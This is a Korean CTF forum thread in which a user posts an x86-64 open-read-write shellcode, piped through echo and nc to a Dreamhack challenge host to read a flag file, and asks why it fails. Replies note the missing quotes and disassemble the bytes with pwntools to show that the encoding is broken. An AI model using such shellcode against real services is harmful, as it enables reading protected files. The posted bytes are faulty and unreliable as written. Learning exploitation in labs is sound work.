완료됨
셀코드 전송
``echo -ne \x48\xb8\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x02\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\x48\xc7\xc2\x30\x00\x00\x48\xc7\xc0\x00\x00\x00\x0f\x05\x48\xc7\xc7\x01\x00\x00\x48\xc7\xc0\x01\x00\x00\x0f\x05 | nc host1.dreamhack.games 1433
이렇개 셀코드를 작성하고 전송을햇는데 shellcode 만뜨고 아무것도 안나와요 뭐 틀린점이 있나요? ㅜㅜ
#shell
작성자 정보
답변
3
bincat
세계수
shellcode로서 기능을 하려면 echo -ne \x41\x41\x41\x41
을 shell에 입력했을때 AAAA가 출력되어야합니다.
$ echo -ne \x41\x41\x41\x41
x41x41x41x41
가 되어버려 안될것같네요!!!
탈퇴한 이용자
대표 업적 없음
2dedce님께서 알려주신대로 따옴표를 부첬습니다 셀코드에 문제가 있는건가요??``
2dedce
워게임 고인물
쉘코드를 디스어셈해서 보겠습니다
from pwn import *
context.arch = 'amd64'
print(disasm(b"\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x02\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\x48\xc7\xc2\x30\x00\x00\x48\xc7\xc0\x00\x00\x00\x0f\x05\x48\xc7\xc7\x01\x00\x00\x48\xc7\xc0\x01\x00\x00\x0f\x05"))
0: 48 b8 6f 6f 6f 6f 6f 6e 67 50 movabs rax, 0x50676e6f6f6f6f6f
a: 48 b8 61 6d 65 5f 73 5f 6c 50 movabs rax, 0x506c5f735f656d61
14: 48 b8 63 2f 66 6c 67 5f 6e 50 movabs rax, 0x506e5f676c662f63
1e: 48 b8 65 6c 6c 5f 61 73 69 50 movabs rax, 0x506973615f6c6c65
28: 48 b8 2f 68 6f 6d 2f 73 68 50 movabs rax, 0x5068732f6d6f682f
32: 48 89 e7 mov rdi, rsp
35: 48 31 f6 xor rsi, rsi
38: 48 31 d2 xor rdx, rdx
3b: 48 c7 c0 02 00 00 0f mov rax, 0xf000002
42: 05 48 89 c7 48 add eax, 0x48c78948
47: 89 e6 mov esi, esp
49: 48 83 ee 30 sub rsi, 0x30
4d: 48 c7 c2 30 00 00 48 mov rdx, 0x48000030
54: c7 c0 00 00 00 0f mov eax, 0xf000000
5a: 05 48 c7 c7 01 add eax, 0x1c7c748
5f: 00 00 add BYTE PTR [rax], al
61: 48 c7 c0 01 00 00 0f mov rax, 0xf000001
68: 05 .byte 0x5
쉘코드가 이상합니다.